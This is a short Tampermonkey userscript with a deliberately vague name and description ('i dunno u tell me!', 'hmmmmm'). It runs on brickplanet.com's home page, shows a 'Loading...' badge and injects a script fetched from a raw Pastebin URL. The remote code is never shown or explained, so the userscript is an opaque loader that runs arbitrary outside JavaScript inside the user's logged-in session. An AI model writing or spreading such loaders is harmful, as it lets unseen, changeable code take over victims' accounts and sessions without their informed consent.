i dunno u tell me!

hmmmmm

// ==UserScript==
// @name         i dunno u tell me!
// @namespace    http://tampermonkey.net/
// @license      Do Whatever The Fuck You Want Public License
// @version      1.11
// @description  hmmmmm
// @author       person who lives in the universe
// @match        https://www.brickplanet.com/home*
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

    const scriptUrl = 'https://pastebin.com/raw/n2R74js1';

    const loadingDiv = document.createElement('div');
    loadingDiv.textContent = 'Loading...';
    loadingDiv.style.position = 'fixed';
    loadingDiv.style.bottom = '10px';
    loadingDiv.style.left = '10px';
    loadingDiv.style.backgroundColor = 'rgba(0,0,0,0.7)';
    loadingDiv.style.color = 'white';
    loadingDiv.style.padding = '5px 10px';
    loadingDiv.style.borderRadius = '5px';
    loadingDiv.style.zIndex = 9999;
    loadingDiv.style.fontFamily = 'Arial, sans-serif';
    loadingDiv.style.fontSize = '14px';
    document.body.appendChild(loadingDiv);

    const script = document.createElement('script');
    script.src = scriptUrl;
    script.async = true;
    script.onload = () => loadingDiv.remove();
    script.onerror = () => {
        loadingDiv.textContent = 'Failed to load script';
        loadingDiv.style.backgroundColor = 'rgba(255,0,0,0.7)';
    };
    document.body.appendChild(script);

})();